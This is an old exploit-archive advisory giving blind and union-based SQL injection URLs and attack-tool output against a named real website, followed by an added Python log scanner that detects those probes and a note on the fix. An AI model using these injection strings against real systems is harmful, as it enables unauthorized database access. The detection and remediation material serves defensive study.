===============================================================================
                               C r a C k E r
              T H E  C R A C K  O F  E T E R N A L  M I G H T
===============================================================================
        From The Ashes and Dust Rises An Unimaginable crack....
===============================================================================
                                 [ EZINE ]
===============================================================================
  Author    : CraCkEr
  Website   : symantec.com
  Vuln Type : Blind SQL Injection
  Method    : GET
  Critical  : High
  Impact    : Database access

  Famous Sites Can Be Also Vulned

  DALnet #crackers
===============================================================================
  Release Notes:
  --------------
  Typically used for remotely exploitable vulnerabilities that can lead to
  system compromise.

===============================================================================
  Exploit URLs
===============================================================================
[+] Remote SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--
[+] Blind SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0
[+] Text Change
Bedriftsfordelene ved sosiale nettverk
[+] Attack Results
[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 18:00:05
[+] Number of Rows: 85
[-] 00:58:04
[-] Total URL Requests 10602
[-] Done
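
The request shapes shown in the exploit URLs above (the "union select" probe and the "and 1=1" / "and 1=0" pair sent to the numeric parameter l) stand out in web-server access logs. The Python below is an added example, not part of the original advisory: the log lines, client addresses and function names are constructed for illustration, and it assumes legitimate traffic only ever sends a plain integer in l.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (not from the advisory).
# 192.0.2.0/24 and 198.51.100.0/24 are documentation-only address ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /2008/03/index.php?p=lp&l=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /2008/03/index.php?p=lp&l=1%20and%201=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /2008/03/index.php?p=lp&l=1%20and%201=0 HTTP/1.1" 200 4310
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /2008/03/index.php?p=lp&l=-1%20union%20select%201,2,3-- HTTP/1.1" 200 4402
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) ')
UNION = re.compile(r"\bunion\b.+\bselect\b", re.I)
BOOLEAN = re.compile(r"\b(?:and|or)\b\s+(\d+)\s*=\s*(\d+)", re.I)

def classify(value):
    """Label one URL-decoded value of the numeric parameter."""
    if re.fullmatch(r"\d+", value):
        return "clean"
    if UNION.search(value):
        return "union"
    m = BOOLEAN.search(value)
    if m:
        return "bool-true" if int(m.group(1)) == int(m.group(2)) else "bool-false"
    return "non-numeric"

def scan(log_text, param="l"):
    """Return {client_ip: set of labels} for clients that sent non-integer values."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a GET request line in the expected format
        query = parse_qs(urlsplit(m.group(2)).query, keep_blank_values=True)
        for value in query.get(param, []):
            label = classify(value)
            if label != "clean":
                hits[m.group(1)].add(label)
    return dict(hits)

def blind_probers(hits):
    """Clients that sent both an always-true and an always-false condition."""
    return sorted(ip for ip, seen in hits.items() if {"bool-true", "bool-false"} <= seen)
```

The server-side fix is to validate l as an integer and pass it to the database through a prepared statement rather than concatenating it into the query string.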
===============================================================================
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL.
===============================================================================
                             © CraCkEr 2008
===============================================================================
# milw0rm.com [2008-10-07]